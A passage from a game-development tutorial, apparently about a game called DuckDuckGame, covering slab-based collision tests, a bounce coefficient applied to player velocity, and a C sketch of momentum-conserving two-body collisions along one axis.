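            if (t1 > t2) { float tmp = t1; t1 = t2; t2 = tmp; }
            if (t1 > tmin) tmin = t1;
            if (t2 < tmax) tmax = t2;
            if (tmin > tmax) return false;   /* the slabs do not overlap */
        }
    }
    return true;
}
```

A diagonal move from (0, 15) to (15, 0) misses a wall at (10, 10) of size 10x10 with this test, even though the bounding box of that move overlaps the wall. Testing the full player box rather than a point would require enlarging the wall by the player's half-size first.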

Bouncing

Once the physics foundations are in place, implementing a bounce system is fairly simple.
We just need to define a bounce coefficient for the game's objects and multiply the player's speed along the collision axis by the negative of that coefficient, which reverses its direction and scales it by a set factor.
Example:
the player moves 5 to the right (movement on X) and hits an obstacle with a bounce coefficient of 1.
We have player_speed * -(bounce_coeff) = new_player_speed,
so here 5 * -1 = -5: our player goes the other way with no loss of speed, which is the expected behavior.

Here is what this looks like in code:

// ...
// On collision:

// Bounce coefficient:
// 0 -> No bounce
// 1 -> Full bounce, no loss of momentum
float bounciness = 1;

// If the collision is on the Y axis, coming from above
if (collider->rect->y + collider->rect->h <= collidee->rect->y)
{
    // Negate the Y speed and multiply it by the bounce coefficient
    collider->vY *= -bounciness;

    // Collision handling
}
// Handling of the Y axis from below and of the X axis is similar
// ...

Note that this formula assumes the collidee is static, or at least does not react to the collision (it could, for example, be in linear motion, like a moving platform). If both objects are moving and react to each other, we would need to introduce mass and apply conservation of momentum to compute the new velocities of both objects.
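
As a sketch of that two-body case, restricted to a single axis, the standard momentum-conserving formulas with a bounce coefficient can be written as follows. The Body1D type and the function name are assumptions for this example; nothing like it exists in DuckDuckGame.

```c
/* Hypothetical 1D body: mass and velocity along the collision axis. */
typedef struct {
    float mass;
    float v;
} Body1D;

/* Update both velocities after a head-on collision.
 * bounciness: 0 -> the bodies move on together, 1 -> fully elastic. */
void resolve_collision_1d(Body1D *a, Body1D *b, float bounciness) {
    float total    = a->mass + b->mass;
    float momentum = a->mass * a->v + b->mass * b->v;
    float closing  = a->v - b->v;   /* relative speed before impact */

    a->v = (momentum - b->mass * bounciness * closing) / total;
    b->v = (momentum + a->mass * bounciness * closing) / total;
}
```

With equal masses and a coefficient of 1, a body moving at 5 stops and the other leaves at 5. When the second body is at rest and much heavier than the first, the result approaches the simpler rule used above, where the collider's speed is multiplied by -bounciness.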
